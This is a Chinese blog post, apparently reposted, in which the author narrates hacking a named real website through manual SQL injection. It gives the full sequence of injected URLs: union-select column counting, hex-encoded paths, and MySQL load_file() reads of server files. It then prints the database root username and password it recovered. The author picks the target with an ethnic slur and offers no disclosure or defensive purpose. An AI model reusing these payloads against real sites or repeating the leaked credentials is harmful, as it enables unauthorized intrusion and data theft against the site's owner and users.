| 关键词: spywareguide shareedge PHP product http show 页面 select union 代码 |
说实话我还从来没正面入侵过PHP类站点。前天QQ上某朋友跟我说我不该只停留在自己会的那些上面,应该学习研究一些不会的,并实践检查一下。说的很有道理,我也很想啊,可惜这方面一直都没人教过我,从头到尾都是自学的。不过,我也知道这个东西是别人教不会的!好了,不扯了,说学咱就学。Google里找了个目标http://www.shareedge.com,这个是小日本的,所以我就直接贴出来,搞死他!HTTP头信息:HTTP/1.1 200 OKDate: Sat, 03 Jan 2009 14:35:22 GMTServer: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.6c PHP/4.4.7X-Powered-By: PHP/4.4.7Keep-Alive: timeout=10, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlX-Pad: avoid browser bug 找到注入点http://www.shareedge.com/spywareguide/product_show.php?id=469判断注入点的方法全都是一样的1=1和1=2。下面开始纯手工注入:第一步:http://www.shareedge.com/spywareguide/product_show.php?id=469 and 1=2 union select 1/*返回错误页面,go on...第二部:http://www.shareedge.com/spywareguide/product_show.php?id=469 and 1=2 union select 2,1/*还是错误页面,go on...第三步:http://www.shareedge.com/spywareguide/product_show.php?id=469 and 1=2 union select 3,2,1/*依旧是错误页面,直到试到http://www.shareedge.com/spywareguide/product_show.php?id=469 and 1=2 union select 14,13,12,11,10,9,8,7,6,5,4,3,2,1/*返回页面是我们想要的数字页面,且爆出了当前所访问文件的物理路径为/usr/local/apache2/htdocs/spywareguide/product_show.php 。你要是问这个物理路径怎么没有说是在C盘还是D盘...我想你该去装个linux或unix系统玩玩了。我们将该物理路径转换成十六进制为0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F7370797761726567756964652F70726F647563745F73686F772E706870接着使用MYSQL的load_file()函数将该文件信息读取出来。提交http://www.shareedge.com/spywareguide/product_show.php?id=469 and 1=2 union select 14,13,12,11,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F7370797761726567756964652F70726F647563745F73686F772E706870),9,8,7,6,5,4,3,2,1/*从显示出的网页中看看有什么重要信息,如下代码引起了我的兴趣。$link_id = mysql_connect("localhost",$userid,$userpassword)连接数据库的嘛!那么这行代码之前一定有该方法的具体参数值等信息吧。结果没找到,不过却发现使用了包含语句。include 'dict.php'包含进来这个文件,那这个文件里肯定就有那些信息了。采用同样的方法读取dict.php文件,得到其内容如下 Php 代码复制代码<?php // Make modifications to make non-default user/password/data base name $userid = "root"; //change to real db user name $userpassword = "nextedge"; //change to real db user password $dbname = "spywareguide"; //change to real db name?> <?php // Make modifications to make non-default user/password/data base name $userid = "root"; //change to real db user name $userpassword = "nextedge"; //change to real db user password $dbname = "spywareguide"; //change to real db name?>找到MYSQL的超级管理员信息了,呼呼~^_^。可惜人家没有对外开放3306端口,网站后台和phpmyadmin也都未找到。今天的学习至此结束 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|